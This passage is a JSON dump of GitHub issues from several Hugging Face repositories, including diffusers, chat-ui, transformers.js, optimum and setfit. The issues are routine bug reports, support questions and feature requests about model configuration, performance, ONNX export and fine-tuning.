got:\r\n```\r\nort-wasm-simd-threaded.jsep.wasm\r\nmodels/config.json\r\nmodels/generation_config.json\r\nmodels/preprocessor_config.json\r\nmodels/tokenizer_config.json\r\nmodels/tokenizer.json\r\nmodels/onnx/decoder_model_merged_q4.onnx\r\nmodels/onnx/encoder_model.onnx\r\n```\r\nThis returns the `SyntaxError: Unexpected token '<', \"\r\n\r\nI wonder how can we localize questions like this. I've tried \u2318R+ which always gives me the local time of Paris. Qwen2.5-72B and Llama 3.1 make up another non-specific time that's not my local time. I have web-search enabled too, and I can see that they're using it too, but they can't get it right, even when I give them my exact location both in the model's system prompt on HuggingChat, or in the chat context of the app itself.\r\n", "url": "https://github.com/huggingface/chat-macOS/issues/7", "state": "open", "labels": [ "good first issue" ], "created_at": "2024-09-24T23:09:31Z", "updated_at": "2024-10-23T20:08:57Z", "user": "Reza2kn" }, { "repo": "huggingface/diffusers", "number": 9520, "title": "UNetMotionModel.dtype is really expensive to call, is it possible to cache it during inference?", "body": "**What API design would you like to have changed or added to the library? Why?**\r\nwe are using class UNetMotionModel(ModelMixin, ConfigMixin, UNet2DConditionLoadersMixin, PeftAdapterMixin)\r\nand its `forward()` implementation is calling self.dtype, which is very expensive\r\n![image](https://github.com/user-attachments/assets/cb840057-ccf7-46ed-847d-2c8aef292fe9)\r\nfrom my profiling trace result, calling self.dtype takes 6-10ms each time.\r\ncan we somehow cache it to save time?\r\n![image](https://github.com/user-attachments/assets/b5ef3c1e-ee9f-4f02-922e-854ebe269568)\r\n\r\nI took a look at ModelMixin.dtype() property function, it get all parameters of the model into tuple to check only first parameter's dtype, i don't thinkmake sense to do this everytime. right?\r\n![image](https://github.com/user-attachments/assets/b74a8c31-0b4e-44cb-ab09-e3f7c5559dad)\r\n\r\n**What use case would this enable or better enable? Can you give us a code example?**\r\nWe are using this model to do video generation, so the inference is running repeatedly. Is it easy to optimize this ~10ms latency?\r\nThanks!", "url": "https://github.com/huggingface/diffusers/issues/9520", "state": "closed", "labels": [ "wip", "performance" ], "created_at": "2024-09-24T18:03:28Z", "updated_at": "2025-01-02T13:40:51Z", "comments": 7, "user": "xiang9156" }, { "repo": "huggingface/chat-ui", "number": 1484, "title": "Header prompt displayed using Llama3.1 with ollama", "body": "Hello,\r\n\r\nI'm using the ```llama3.1:latest``` model with ```ollama``` and I'm having trouble correctly initializing the ```chatPromptTemplate``` variable.\r\n\r\nI used this Github issue to initialize this variable : https://github.com/huggingface/chat-ui/issues/1035 \r\n\r\nHere is my ```.env.local``` file :\r\n\r\n```.env\r\nMONGODB_URL=mongodb://mongodb:27017\r\nHF_TOKEN=\r\n\r\nPUBLIC_APP_NAME=\r\n\r\nMODELS=`[\r\n {\r\n \"name\": \"Ollama | Llama3.1\",\r\n \"chatPromptTemplate\": \"<|begin_of_text|>{{#if @root.preprompt}}<|start_header_id|>system<|end_header_id|>\\n\\n{{@root.preprompt}}<|eot_id|>{{/if}}{{#each messages}}{{#ifUser}}<|start_header_id|>user<|end_header_id|>\\n\\n{{content}}<|eot_id|>{{/ifUser}}{{#ifAssistant}}<|start_header_id|>assistant<|end_header_id|>\\n\\n{{content}}<|eot_id|>{{/ifAssistant}}{{/each}}\",\r\n \"parameters\": {\r\n \"temperature\": 0.1,\r\n \"top_p\": 0.95,\r\n \"repetition_penalty\": 1.2,\r\n \"top_k\": 50,\r\n \"truncate\": 3072,\r\n \"max_new_tokens\": 1024,\r\n \"stop\": [\"<|end_of_text|>\", \"<|eot_id|>\"]\r\n },\r\n \"endpoints\": [\r\n {\r\n \"type\": \"ollama\",\r\n \"url\" : \"http://ollama:11434\",\r\n \"ollamaName\" : \"llama3.1:latest\"\r\n }\r\n ]\r\n }\r\n]`\r\n```\r\n\r\nBut ```<|start_header_id|>assistant<|end_header_id|>``` appears on every response :\r\n\r\n![chat-ui-screen](https://github.com/user-attachments/assets/5cb3919e-0ee8-4335-8a53-d811818612e9)\r\n\r\nCan you help me make it disappear by modifying ```chatPromptTemplate``` variable ?\r\n\r\nThanks in advance.\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1484", "state": "closed", "labels": [ "support" ], "created_at": "2024-09-24T13:33:16Z", "updated_at": "2024-09-30T08:43:06Z", "comments": 3, "user": "avirgos" }, { "repo": "huggingface/diffusers", "number": 9508, "title": "AnimateDiff SparseCtrl RGB does not work as expected", "body": "Relevant comments are [this](https://github.com/huggingface/diffusers/pull/8897#issuecomment-2255416318) and [this](https://github.com/huggingface/diffusers/pull/8897#issuecomment-2255478105).\r\n\r\nAnimateDiff SparseCtrl RGB does not work similar to other implementations and cannot replicate their outputs. This makes me believe that there is something incorrect with our SparseControlNet or MotionAdapter implementation.\r\n\r\nWhen comparing the results of the [original](https://github.com/guoyww/AnimateDiff)/[Comfy](https://github.com/Kosinkadink/ComfyUI-AnimateDiff-Evolved) implementation to Diffusers implementation, one can notice that if an image is used with an unrelated prompt, the Diffusers implementation ignores the image and just follows the prompt whereas the other implementations try to incorporate both.\r\n\r\nSince the original and Comfy implementations produce this behaviour consistently, this seems more like a problem with Diffusers implementation. However, I've not been able to spot differences in implementation just by comparing the code visually. I also tried matching outputs layerwise and it seemed to be alright (although I didn't investigate this as deeply as I should have due to other priorities). \r\n\r\nIf someone from the community actively following/using the AnimateDiff implementations can help determine the cause of this bug, it would be really awesome and helpful.", "url": "https://github.com/huggingface/diffusers/issues/9508", "state": "open", "labels": [ "bug", "help wanted", "stale", "contributions-welcome", "advanced" ], "created_at": "2024-09-23T21:42:54Z", "updated_at": "2025-08-10T16:47:50Z", "comments": 9, "user": "a-r-r-o-w" }, { "repo": "huggingface/lerobot", "number": 451, "title": " Inquiry about Implementation of \"Aloha Unleashed\" ", "body": "First and foremost, I would like to extend my heartfelt gratitude for your incredible work on the Lerobo project. \r\n\r\nI recently came across the paper \"Aloha Unleashed\" published by the Aloha team a few months ago, and I am curious to know if there are any plans to implement the methodologies and findings from this paper into the Lerobo project.\r\n\r\nThank you once again for your hard work and for providing such a fantastic tool to the community. I look forward to your response.\r\n\r\npaper link\uff1ahttps://aloha-unleashed.github.io/", "url": "https://github.com/huggingface/lerobot/issues/451", "state": "open", "labels": [ "question", "robots" ], "created_at": "2024-09-23T09:14:56Z", "updated_at": "2025-08-20T19:42:37Z", "user": "lightfate" }, { "repo": "huggingface/text-generation-inference", "number": 2541, "title": "How to serve local models with python package (not docker)", "body": "### System Info\n\n`pip install text-generation `with version '0.6.0'\r\nI need to use python package not docker\n\n### Information\n\n- [ ] Docker\n- [ ] The CLI directly\n\n### Tasks\n\n- [ ] An officially supported command\n- [ ] My own modifications\n\n### Reproduction\n\n```\r\nfrom text_generation import Client\r\n\r\n# Initialize the client\r\nclient = Client(\"/path/to/model/locally\")\r\n\r\n# Generate text\r\nresponse = client.generate(\"Your input text here\")\r\n```\r\n\r\nerror:\r\n```\r\nMissingSchema: Invalid URL '/path/to/model/locally': No scheme supplied. Perhaps you meant [/path/to/model/locally](/path/to/model/locally?\r\n```\r\n\r\nalso I tried this as with some models also on huggingface and local models doesn't work!\r\n\r\n```\r\nfrom text_generation import InferenceAPIClient\r\nclient = InferenceAPIClient(\"NousResearch/Meta-Llama-3.1-8B-Instruct\")\r\ntext = client.generate(\"Why is the sky blue?\").generated_text\r\nprint(text)\r\n# ' Rayleigh scattering'\r\n\r\n# Token Streaming\r\ntext = \"\"\r\nfor response in client.generate_stream(\"Why is the sky blue?\"):\r\n if not response.token.special:\r\n text += response.token.text\r\n\r\nprint(text)\r\n```\r\n\r\n\r\nerror:\r\n```\r\nNotSupportedError: Model `NousResearch/Meta-Llama-3.1-8B-Instruct` is not available for inference with this client. \r\nUse `huggingface_hub.inference_api.InferenceApi` instead.\r\n```\n\n### Expected behavior\n\n- I can load any model ( local or form HF hub)\r\n\r\n", "url": "https://github.com/huggingface/text-generation-inference/issues/2541", "state": "open", "labels": [], "created_at": "2024-09-20T21:10:09Z", "updated_at": "2024-09-26T06:55:50Z", "user": "hahmad2008" }, { "repo": "huggingface/competitions", "number": 41, "title": "how to debug a script submission", "body": "is there way to see logs or errors of a script based submission", "url": "https://github.com/huggingface/competitions/issues/41", "state": "closed", "labels": [], "created_at": "2024-09-20T18:04:44Z", "updated_at": "2024-09-30T16:08:42Z", "user": "ktrapeznikov" }, { "repo": "huggingface/diffusers", "number": 9485, "title": "Can we allow making everything on gpu/cuda for scheduler?", "body": "**What API design would you like to have changed or added to the library? Why?**\r\nIs it possible to allow setting every tensor attribute of scheduler to cuda device?\r\nIn https://github.com/huggingface/diffusers/blob/main/src/diffusers/schedulers/scheduling_lcm.py\r\nIt looks like that attributes like `scheduler.alphas_cumprod` are tensors on cpu, but the scheduler.set_timesteps() allows setting `scheduler.timesteps` to gpu/cuda device. Isn't this causing device mismatch when indexing scheduler.alphas_cumprod with scheduler.timesteps? Below is the code snippet that the pipline is indexing a cpu tensor(alphas_cumprod) with a gpu tensor(timestep)\r\n![image](https://github.com/user-attachments/assets/42b31655-0b4f-4623-9524-5d55bf7b7f5c)\r\nI simply added following lines to print the timestep and self.alphas_cumprod type and device at the begining of the `scheduler.step()`\r\n```\r\nprint(\"Printing scheduler.step() timestep\")\r\nprint(type(timestep))\r\nprint(isinstance(timestep, torch.Tensor))\r\nprint(timestep.device)\r\nprint(\"Printing scheduler.step() self.alphas_cumprod\")\r\nprint(type(self.alphas_cumprod))\r\nprint(isinstance(self.alphas_cumprod, torch.Tensor))\r\nprint(self.alphas_cumprod.device)\r\n``` \r\nOutput when running text-to-image:\r\n```\r\nPrinting scheduler.step() timestep\r\n\r\nTrue\r\ncuda:0\r\nPrinting scheduler.step() self.alphas_cumprod\r\n\r\nTrue\r\ncpu\r\n```\r\n\r\n**What use case would this enable or better enable? Can you give us a code example?**\r\nWe are using a modified LCMScheduler (99% same as the original LCMScheduler) for video generations, it's generating frames repeatedly in a loop. for most of the time, this step doesn't cause performance issue. But we did see intermittent high cpu usage and latency for `alpha_prod_t = self.alphas_cumprod[timestep]`. And from torch.profiler and tracing output, it. shows high latency for this specific step. We are wondering if this is the performance bottleneck.\r\n![image](https://github.com/user-attachments/assets/04f5040b-734c-46a6-8171-17a30f221b14)\r\n\r\n\r\n", "url": "https://github.com/huggingface/diffusers/issues/9485", "state": "open", "labels": [ "stale", "scheduler", "performance" ], "created_at": "2024-09-20T12:38:16Z", "updated_at": "2024-12-17T15:04:46Z", "comments": 14, "user": "xiang9156" }, { "repo": "huggingface/optimum", "number": 2032, "title": "ONNX support for decision transformers", "body": "### Feature request\r\n\r\nI am trying to train off-line RL using decision transformer, convert to .onnx.\r\n\r\n```\r\nfrom pathlib import Path\r\nfrom transformers.onnx import FeaturesManager\r\n\r\nfeature = \"sequence-classification\"\r\n\r\n# load config\r\nmodel_kind, model_onnx_config = FeaturesManager.check_supported_model_or_raise(model, feature=feature)\r\nonnx_config = model_onnx_config(model.config)\r\n\r\n# export\r\nonnx_inputs, onnx_outputs = transformers.onnx.export(\r\n #preprocessor=tokenizer,\r\n model=model,\r\n config=onnx_config,\r\n opset=13,\r\n output=Path(\"trained_models/DT-model.onnx\")\r\n)\r\n```\r\n\r\nGet the below error:\r\n\r\n```\r\nKeyError: \"decision-transformer is not supported yet. Only ['albert', 'bart', 'beit', 'bert', 'big-bird', 'bigbird-pegasus', 'blenderbot', 'blenderbot-small', 'bloom', 'camembert', 'clip', 'codegen', 'convbert', 'convnext', 'data2vec-text', 'data2vec-vision', 'deberta', 'deberta-v2', 'deit', 'detr', 'distilbert', 'electra', 'flaubert', 'gpt2', 'gptj', 'gpt-neo', 'groupvit', 'ibert', 'imagegpt', 'layoutlm', 'layoutlmv3', 'levit', 'longt5', 'longformer', 'marian', 'mbart', 'mobilebert', 'mobilenet-v1', 'mobilenet-v2', 'mobilevit', 'mt5', 'm2m-100', 'owlvit', 'perceiver', 'poolformer', 'rembert', 'resnet', 'roberta', 'roformer', 'segformer', 'squeezebert', 'swin', 't5', 'vision-encoder-decoder', 'vit', 'whisper', 'xlm', 'xlm-roberta', 'yolos'] are supported. If you want to support decision-transformer please propose a PR or open up an issue.\"\r\n```\r\n\r\n### Motivation\r\n\r\nI would want to use trained models in Godot-RL-Agents. Currently agents are trained using PPO OR imitation learning and bothe support onnx format. Supporting decision transformers could hugely help training models navigating complex scenarios.\r\n\r\n### Your contribution\r\n\r\nI would be interested to raise a PR. But at this time, I have no idea how to go about this. With little bit of guidance, I can try.", "url": "https://github.com/huggingface/optimum/issues/2032", "state": "closed", "labels": [ "onnx" ], "created_at": "2024-09-20T08:45:28Z", "updated_at": "2024-11-25T13:00:02Z", "comments": 1, "user": "ra9hur" }, { "repo": "huggingface/setfit", "number": 558, "title": "How to improve the accuracy while classifying short text with less context", "body": "Hi, my usecase is to classify Job Title into Functional Areas. I finetuned `all-mpnet-base-v2` with the help of setfit by providing some 10+ examples for each class (Functional Areas). \r\n\r\nI got `82%` accuracy on running the evaluation on my test set. I observed some of the simple & straightforward job titles are classified into wrong label with `0.6` score.\r\n\r\nFor example:\r\n```\r\nQuery: SDET\r\nPredicted Label: Big Data / DWH / ETL\r\nConfidence Scores:\r\nLabel: Accounting / Finance, Confidence: 0.0111\r\nLabel: Backend Development, Confidence: 0.0140\r\nLabel: Big Data / DWH / ETL, Confidence: 0.6092\r\n```\r\n\r\nHere **SDET** should have labelled as `QA / SDET` but it is classified to `Big Data / DWH / ETL` with `0.62` score. Few shot examples used for both classes doesn't have anything in common which could confuse the model except one example whose title is `Data Quality Engineer` and it is under `Big Data / DWH / ETL`.\r\n\r\n**Few shot examples** (added only for 2 here)\r\n```py\r\n{ \"QA / SDET\": [\r\n \"Quality Assurance Engineer\",\r\n \"Software Development Engineer in Test (SDET)\",\r\n \"QA Automation Engineer\",\r\n \"Test Engineer\",\r\n \"QA Analyst\",\r\n \"Manual Tester\",\r\n \"Automation Tester\",\r\n \"Performance Test Engineer\",\r\n \"Security Test Engineer\",\r\n \"Mobile QA Engineer\",\r\n \"API Tester\",\r\n \"Load & Stress Test Engineer\",\r\n \"Senior QA Engineer\",\r\n \"Test Automation Architect\",\r\n \"QA Lead\",\r\n \"QA Manager\",\r\n \"End-to-End Tester\",\r\n \"Game QA Tester\",\r\n \"UI/UX Tester\",\r\n \"Integration Test Engineer\",\r\n \"Quality Control Engineer\",\r\n \"Test Data Engineer\",\r\n \"DevOps QA Engineer\",\r\n \"Continuous Integration (CI) Tester\",\r\n \"Software Test Consultant\"\r\n ],\r\n \r\n \"Big Data / DWH / ETL\": [\r\n \"Big Data Engineer\",\r\n \"Data Warehouse Developer\",\r\n \"ETL Developer\",\r\n \"Hadoop Developer\",\r\n \"Spark Developer\",\r\n \"Data Engineer\",\r\n \"Data Integration Specialist\",\r\n \"Data Pipeline Engineer\",\r\n \"Data Architect\",\r\n \"Database Administrator\",\r\n \"ETL Architect\",\r\n \"Data Lake Engineer\",\r\n \"Informatica Developer\",\r\n \"DataOps Engineer\",\r\n \"BI Developer\",\r\n \"Data Migration Specialist\",\r\n \"Data Warehouse Architect\",\r\n \"ETL Tester\",\r\n \"Big Data Platform Engineer\",\r\n \"Apache Kafka Engineer\",\r\n \"Snowflake Developer\",\r\n \"Data Quality Engineer\",\r\n \"Data Ingestion Engineer\",\r\n \"Big Data Consultant\",\r\n \"ETL Manager\"\r\n ]\r\n}\r\n```\r\n\r\n**TrainingArgs**\r\n```py\r\nargs = TrainingArguments(\r\n batch_size=16,\r\n num_epochs=1,\r\n evaluation_strategy=\"epoch\",\r\n save_strategy=\"epoch\",\r\n load_best_model_at_end=True,\r\n)\r\n```\r\n\r\n**Here is the complete set of functional areas.**\r\n```py\r\nfunctional_areas = [\r\n \"Accounting / Finance\",\r\n \"Backend Development\",\r\n \"Big Data / DWH / ETL\",\r\n \"Brand Management\",\r\n \"Content Writing\",\r\n \"Customer Service\",\r\n \"Data Analysis / Business Intelligence\",\r\n \"Data Science / Machine Learning\",\r\n \"Database Admin / Development\",\r\n \"DevOps / Cloud\",\r\n \"Embedded / Kernel Development\",\r\n \"Event Management\",\r\n \"Frontend Development\",\r\n \"Full-Stack Development\",\r\n \"Functional / Technical Consulting\",\r\n \"General Management / Strategy\",\r\n \"IT Management / IT Support\",\r\n \"IT Security\",\r\n \"Mobile Development\",\r\n \"Network Administration\",\r\n \"Online Marketing\",\r\n \"Operations Management\",\r\n \"PR / Communications\",\r\n \"QA / SDET\",\r\n \"SEO / SEM\",\r\n \"Sales / Business Development\"\r\n]\r\n```\r\n\r\nMy guess is accuracy is low because of short text (which is just job title). Please suggest few things which I can try out to improve the accuracy of the model.", "url": "https://github.com/huggingface/setfit/issues/558", "state": "open", "labels": [], "created_at": "2024-09-20T06:09:07Z", "updated_at": "2024-11-11T11:23:31Z", "user": "29swastik" }, { "repo": "huggingface/safetensors", "number": 527, "title": "[Question] Comparison with the zarr format?", "body": "Hi,\r\n\r\nI know that safetensors are widely used nowadays in HF, and the comparisons made in this repo's README file make a lot of sense.\r\n\r\nHowever, I am now surprised to see that there is no comparison with zarr, which is probably the most widely used format to store tensors in an universal, compressed and scalable way.\r\n\r\nIs there any particular reason why safetensors was created instead of just using zarr, which has been around for longer (and has nice benefits such as good performance in object storage reads and writes)?\r\n\r\nThank you!", "url": "https://github.com/huggingface/safetensors/issues/527", "state": "open", "labels": [], "created_at": "2024-09-19T13:32:17Z", "updated_at": "2025-01-13T17:56:46Z", "comments": 13, "user": "julioasotodv" }, { "repo": "huggingface/transformers", "number": 33584, "title": "How to fine tune Qlora with Custum trainer. ", "body": "Full model fine-tuning code is given below. How can i modify the code to train Qlora based model.\r\n\r\n```import sys\r\nimport os\r\ncurrent_directory = os.path.dirname(os.path.abspath(__file__))\r\nsys.path.append(current_directory) \r\n\r\nfrom src.custom_dataset import RawFileDataset\r\nimport copy\r\nimport random\r\nfrom dataclasses import dataclass, field\r\nfrom typing import Optional, Dict, Sequence\r\nimport os\r\n\r\nimport torch\r\nimport torch.distributed\r\nimport transformers\r\nfrom transformers import Trainer\r\n\r\nIGNORE_INDEX = -100\r\nDEFAULT_PAD_TOKEN = \"[PAD]\"\r\nDEFAULT_EOS_TOKEN = \"\"\r\nDEFAULT_BOS_TOKEN = \"\"\r\nDEFAULT_UNK_TOKEN = \"\"\r\n\r\n\r\n\r\n@dataclass\r\nclass ModelArguments:\r\n model_name_or_path: Optional[str] = field(default=\"facebook/opt-125m\")\r\n\r\n\r\n@dataclass\r\nclass DataArguments:\r\n data_path: str = field(default=None, metadata={\"help\": \"Path to the training data.\"})\r\n train_file: str = field(default=None, metadata={\"help\": \"train file name\"})\r\n val_file: str = field(default=None, metadata={\"help\": \"val file name\"})\r\n\r\n@dataclass\r\nclass TrainingArguments(transformers.TrainingArguments):\r\n cache_dir: Optional[str] = field(default=None)\r\n optim: str = field(default=\"adamw_torch\")\r\n model_max_length: int = field(\r\n default=512,\r\n metadata={\"help\": \"Maximum sequence length. Sequences will be right padded (and possibly truncated).\"},\r\n )\r\n\r\n\r\ndef safe_save_model_for_hf_trainer(trainer: transformers.Trainer, output_dir: str):\r\n \"\"\"Collects the state dict and dump to disk.\"\"\"\r\n state_dict = trainer.model.state_dict()\r\n if trainer.args.should_save:\r\n cpu_state_dict = {key: value.cpu() for key, value in state_dict.items()}\r\n del state_dict\r\n trainer._save(output_dir, state_dict=cpu_state_dict) # noqa\r\n\r\n\r\ndef smart_tokenizer_and_embedding_resize(\r\n special_tokens_dict: Dict,\r\n tokenizer: transformers.PreTrainedTokenizer,\r\n model: transformers.PreTrainedModel,\r\n):\r\n \"\"\"Resize tokenizer and embedding.\r\n\r\n Note: This is the unoptimized version that may make your embedding size not be divisible by 64.\r\n \"\"\"\r\n num_new_tokens = tokenizer.add_special_tokens(special_tokens_dict)\r\n model.resize_token_embeddings(len(tokenizer))\r\n\r\n if num_new_tokens > 0:\r\n input_embeddings = model.get_input_embeddings().weight.data\r\n output_embeddings = model.get_output_embeddings().weight.data\r\n\r\n input_embeddings_avg = input_embeddings[:-num_new_tokens].mean(dim=0, keepdim=True)\r\n output_embeddings_avg = output_embeddings[:-num_new_tokens].mean(dim=0, keepdim=True)\r\n\r\n input_embeddings[-num_new_tokens:] = input_embeddings_avg\r\n output_embeddings[-num_new_tokens:] = output_embeddings_avg\r\n\r\n\r\ndef _tokenize_fn(strings: Sequence[str], tokenizer: transformers.PreTrainedTokenizer) -> Dict:\r\n \"\"\"Tokenize a list of strings.\"\"\"\r\n tokenized_list = [\r\n tokenizer(\r\n text,\r\n return_tensors=\"pt\",\r\n padding=\"longest\",\r\n max_length=tokenizer.model_max_length,\r\n truncation=True,\r\n )\r\n for text in strings\r\n ]\r\n input_ids = labels = [tokenized.input_ids[0] for tokenized in tokenized_list]\r\n input_ids_lens = labels_lens = [\r\n tokenized.input_ids.ne(tokenizer.pad_token_id).sum().item() for tokenized in tokenized_list\r\n ]\r\n return dict(\r\n input_ids=input_ids,\r\n labels=labels,\r\n input_ids_lens=input_ids_lens,\r\n labels_lens=labels_lens,\r\n )\r\n\r\n\r\ndef preprocess(\r\n sources: Sequence[str],\r\n targets: Sequence[str],\r\n tokenizer: transformers.PreTrainedTokenizer,\r\n) -> Dict:\r\n \"\"\"Preprocess the data by tokenizing.\"\"\"\r\n examples = [s + t for s, t in zip(sources, targets)]\r\n examples_tokenized, sources_tokenized = [_tokenize_fn(strings, tokenizer) for strings in (examples, sources)]\r\n input_ids = examples_tokenized[\"input_ids\"]\r\n labels = copy.deepcopy(input_ids)\r\n for label, source_len in zip(labels, sources_tokenized[\"input_ids_lens\"]):\r\n label[:source_len] = IGNORE_INDEX\r\n return dict(input_ids=input_ids, labels=labels)\r\n\r\n\r\n@dataclass\r\nclass DataCollatorForSupervisedDataset(object):\r\n \"\"\"Collate examples for supervised fine-tuning.\"\"\"\r\n\r\n tokenizer: transformers.PreTrainedTokenizer\r\n\r\n def __call__(self, instances: Sequence[Dict]) -> Dict[str, torch.Tensor]:\r\n ### one can customize here, since we set the T for joint loss as 2\r\n \r\n batch_input_ids1, batch_input_ids2 = [], []\r\n batch_attention_mask1, batch_attention_mask2 = [], []\r\n batch_labels1, batch_labels2 = [], []\r\n\r\n for instance in instances:\r\n instance1, instance2 = instance[\"instance_1\"], instance[\"instance_2\"]\r\n batch_input_ids1.append(instance1[\"input_ids\"])\r\n batch_input_ids2.append(instance2[\"input_ids\"])\r\n batch_attention_mask1.append(instance1[\"attention_mask\"])\r\n batch_attention_mask2.append(instan", "url": "https://github.com/huggingface/transformers/issues/33584", "state": "closed", "labels": [ "trainer", "Quantization" ], "created_at": "2024-09-19T09:40:00Z", "updated_at": "2024-10-28T08:05:06Z", "user": "ankitprezent" }, { "repo": "huggingface/diffusers", "number": 9470, "title": "Prompt scheduling in Diffusers like A1111", "body": "Hi everyone, I have a question that how to implement the [prompt scheduling feature](https://github.com/AUTOMATIC1111/stable-diffusion-webui/wiki/Features#prompt-editing) in A1111 by diffusers library.\r\n\r\n**Example prompt:** Official portrait of a smiling world war ii general, `[male:female:0.99]`, cheerful, happy, detailed face, 20th century, highly detailed, cinematic lighting, digital art painting by Greg Rutkowski.\r\n\r\n![image](https://github.com/user-attachments/assets/d7c4b6d6-a0b9-455b-b4ef-2d581027204f)\r\n", "url": "https://github.com/huggingface/diffusers/issues/9470", "state": "closed", "labels": [], "created_at": "2024-09-19T09:07:30Z", "updated_at": "2024-10-19T17:22:23Z", "comments": 5, "user": "linhbeige" }, { "repo": "huggingface/chat-ui", "number": 1476, "title": "Update docs to explain how to use `tokenizer` field for chat prompt formats", "body": "## Bug description\r\n\r\nIn README.md, it's stated that the prompts used in production for HuggingChat can be found in PROMPTS.md.\r\n\r\nHowever, PROMPTS.md has not been updated for 7 months and there are several prompts missing for newer models.\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1476", "state": "open", "labels": [ "bug", "documentation" ], "created_at": "2024-09-18T22:49:53Z", "updated_at": "2024-09-20T18:05:05Z", "user": "horsten" }, { "repo": "huggingface/transformers.js", "number": 935, "title": "Is converting a Gemma 2B quantized compatible with transformers.js/onnx?", "body": "### Question\n\nI'm new to dev and wanted to know if converting a gemma 2b using the Optimum converter would work for this model?", "url": "https://github.com/huggingface/transformers.js/issues/935", "state": "open", "labels": [ "question" ], "created_at": "2024-09-18T15:57:55Z", "updated_at": "2024-09-24T20:26:53Z", "user": "iamhenry" }, { "repo": "huggingface/dataset-viewer", "number": 3063, "title": "Simplify test code where a dataset is set as gated", "body": "[huggingface_hub@0.25.0](https://github.com/huggingface/huggingface_hub/releases/tag/v0.25.0) provides an API to set a repository as gated.\r\n\r\nWe had included a custom version of `update_repo_settings` because it lacked a `gated` parameter. Now we can switch back to the `huggingface_hub` method\r\n\r\nhttps://github.com/huggingface/dataset-viewer/blob/4859100ef282dcf73257dfb60e6b5a20d5955c68/jobs/cache_maintenance/tests/utils.py#L41\r\nhttps://github.com/huggingface/dataset-viewer/blob/4859100ef282dcf73257dfb60e6b5a20d5955c68/services/admin/tests/fixtures/hub.py#L24\r\nhttps://github.com/huggingface/dataset-viewer/blob/4859100ef282dcf73257dfb60e6b5a20d5955c68/services/worker/tests/fixtures/hub.py#L35", "url": "https://github.com/huggingface/dataset-viewer/issues/3063", "state": "closed", "labels": [ "good first issue", "tests", "refactoring / architecture", "dependencies" ], "created_at": "2024-09-18T09:08:14Z", "updated_at": "2025-07-17T15:00:40Z", "user": "severo" }, { "repo": "huggingface/transformers.js", "number": 934, "title": "Repeating tokens in TextStreamer", "body": "### Question\n\n```\r\nimport {\r\n AutoTokenizer,\r\n AutoModelForCausalLM,\r\n TextStreamer,\r\n InterruptableStoppingCriteria,\r\n} from \"@huggingface/transformers\";\r\n\r\nclass TextGenerationPipeline {\r\n static model = null;\r\n static tokenizer = null;\r\n static streamer = null;\r\n\r\n static async getInstance(\r\n progress_callback = null,\r\n model_id = \"onnx-community/Phi-3.5-mini-instruct-onnx-web\",\r\n ) {\r\n this.tokenizer = AutoTokenizer.from_pretrained(model_id, {\r\n progress_callback,\r\n });\r\n\r\n this.model = AutoModelForCausalLM.from_pretrained(model_id, {\r\n // dtype: \"q4\",\r\n dtype: \"q4f16\",\r\n device: \"webgpu\",\r\n use_external_data_format: true,\r\n progress_callback,\r\n });\r\n\r\n return Promise.all([this.tokenizer, this.model]);\r\n }\r\n}\r\n\r\nconst stopping_criteria = new InterruptableStoppingCriteria();\r\nlet past_key_values_cache = null;\r\n\r\nchrome.runtime.onMessage.addListener((request, sender, sendResponse) => {\r\n if (request.action === \"initializeLlmModel\") {\r\n console.log(\"setting up llm\");\r\n const initialize = async () => {\r\n const [tokenizer, model] = await TextGenerationPipeline.getInstance(\r\n (x) => {\r\n console.log(x);\r\n },\r\n request.model_id,\r\n );\r\n const inputs = tokenizer(\"a\");\r\n const generatedOutput = await model.generate({\r\n ...inputs,\r\n max_new_tokens: 1,\r\n });\r\n console.log(generatedOutput);\r\n sendResponse({ status: \"success\" });\r\n };\r\n\r\n initialize();\r\n return true;\r\n }\r\n\r\n if (request.action === \"generateText\") {\r\n console.log(\"generating text\");\r\n async function generateText() {\r\n const [tokenizer, model] = await TextGenerationPipeline.getInstance();\r\n\r\n const text_callback_function = (output) => {\r\n console.log(output);\r\n if (output) {\r\n chrome.runtime.sendMessage({\r\n action: \"chatMessageChunk\",\r\n chunk: output,\r\n });\r\n }\r\n };\r\n\r\n const streamer = new TextStreamer(tokenizer, {\r\n skip_prompt: true,\r\n skip_special_tokens: true,\r\n callback_function: text_callback_function,\r\n });\r\n\r\n const inputs = tokenizer.apply_chat_template(request.messages, {\r\n add_generation_prompt: true,\r\n return_dict: true,\r\n });\r\n\r\n const { past_key_values, sequences } = await model.generate({\r\n ...inputs,\r\n past_key_values: past_key_values_cache,\r\n // Sampling\r\n // do_sample: true,\r\n // top_k: 3,\r\n // temperature: 0.2,\r\n\r\n max_new_tokens: 1024,\r\n stopping_criteria,\r\n return_dict_in_generate: true,\r\n streamer,\r\n });\r\n\r\n past_key_values_cache = past_key_values;\r\n\r\n const decoded = tokenizer.batch_decode(sequences, {\r\n skip_special_tokens: false,\r\n });\r\n\r\n console.log(decoded);\r\n sendResponse({ generatedOutput: decoded, status: \"success\" });\r\n }\r\n generateText();\r\n return true;\r\n }\r\n});\r\n```\r\n\r\nIn the `text_callback_function` it is sending same token multiple times. What could be the reason? I am handling it on the frontend for the time being but was wondering what is the reason? What am I doing wrong here?\r\n\r\nThank you so much for the help in advance! ", "url": "https://github.com/huggingface/transformers.js/issues/934", "state": "closed", "labels": [ "question" ], "created_at": "2024-09-18T02:53:36Z", "updated_at": "2025-10-13T04:50:11Z", "user": "chandeldivyam" }, { "repo": "huggingface/transformers.js", "number": 933, "title": "Uncaught (in promise) TypeError: r.logits is not iterable", "body": "### Question\r\n\r\nHey guys,\r\n\r\nI have been trying to train a model for text classification then convert it to an onnx file for use in transformers js following this video\r\nhttps://www.youtube.com/watch?v=W_lUGPMW_Eg\r\n\r\nI keep getting the error Uncaught (in promise) TypeError: r.logits is not iterable\r\n\r\nAny ideas on where I might be going wrong or if something has changed since this was released?\r\n\r\nThis is my basic code, I have python hosting the files locally\r\n\r\n```\r\n\r\n\r\n\r\n \r\n \r\n TinyBERT Model in Vanilla JS\r\n\r\n\r\n\r\n

TinyBERT Model Inference

\r\n

Enter text for classification:

\r\n \r\n \r\n\r\n

Prediction:

